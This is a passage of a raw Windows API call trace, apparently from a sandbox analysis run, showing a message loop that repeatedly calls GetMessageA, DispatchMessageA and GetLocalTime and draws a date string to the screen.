wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x297)) [0105.922] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.954] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.954] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.954] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2b7)) [0105.954] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2b7)) [0105.955] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.965] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.965] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.965] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2c3)) [0105.965] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2c3)) [0105.965] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.984] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.984] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.985] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2d6)) [0105.985] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2d6)) [0105.985] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.999] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.999] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.999] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2e4)) [0105.999] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2e4)) [0105.999] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.013] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.013] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.013] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2f2)) [0106.013] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2f2)) [0106.013] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.034] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.034] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.034] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x307)) [0106.034] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x307)) [0106.034] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.169] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.169] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.169] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x38e)) [0106.169] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x38e)) [0106.169] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.173] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.173] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.173] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x392)) [0106.173] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x392)) [0106.173] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.183] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.183] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.183] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x39c)) [0106.183] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x39c)) [0106.183] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.203] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.203] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.203] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x3b0)) [0106.203] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x3b0)) [0106.203] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.220] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.220] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.220] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x3c1)) [0106.220] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x3c1)) [0106.220] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.232] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.232] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.232] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x3cd)) [0106.232] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x3cd)) [0106.232] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.252] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.252] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.252] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x3e1)) [0106.252] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x3e1)) [0106.252] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.262] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.262] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.262] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x3)) [0106.262] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x3)) [0106.262] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0106.262] GetDC (hWnd=0x0) returned 0xa0100d0 [0106.263] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0106.263] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0106.263] GetSysColor (nIndex=8) returned 0x0 [0106.263] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0106.263] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0106.263] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0106.263] UnrealizeObject (h=0x2d10099f) returned 1 [0106.263] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0106.263] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0106.263] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0106.263] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:36 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:36 PM", lprc=0x19f5bd) returned 13 [0106.265] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0106.265] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0106.265] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0106.265] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0106.266] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0106.266] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.284] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.284] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.284] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x19)) [0106.284] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x19)) [0106.284] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.295] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.295] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.295] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x24)) [0106.295] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x24)) [0106.295] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.313] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.313] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.313] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x36)) [0106.313] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x37)) [0106.313] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.323] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.323] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.323] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x40)) [0106.323] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x40)) [0106.323] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.348] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.348] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.348] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x59)) [0106.348] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x59)) [0106.348] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.355] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.355] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.355] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x61)) [0106.356] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x61)) [0106.356] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.376] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.376] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.376] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x75)) [0106.376] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x75)) [0106.376] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.387] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.387] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.387] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x80)) [0106.387] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x80)) [0106.387] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.407] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.407] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.407] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x94)) [0106.407] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x94)) [0106.407] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.417] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.417] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.417] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x9f)) [0106.417] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x9f)) [0106.418] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.437] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.437] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.437] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0xb2)) [0106.437] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0xb2)) [0106.437] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.463] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.463] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.463] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0xcc)) [0106.463] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0xcc)) [0106.463] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.469] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.469] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.469] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0xd2)) [0106.469] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0xd2)) [0106.469] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.480] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.480] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.480] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0xdd)) [0106.480] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0xdd)) [0106.480] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.501] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.501] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.501] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0xf2)) [0106.501] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0xf2)) [0106.501] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.527] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.527] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.527] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x10c)) [0106.527] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x10c)) [0106.527] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.553] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.553] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.553] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x126)) [0106.553] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x126)) [0106.553] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.558] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.558] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.558] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x12b)) [0106.558] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x12b)) [0106.558] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.574] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.574] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.574] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x13b)) [0106.574] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x13b)) [0106.574] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.595] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.595] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.595] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x150)) [0106.595] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x150)) [0106.595] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.611] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.611] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.611] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, 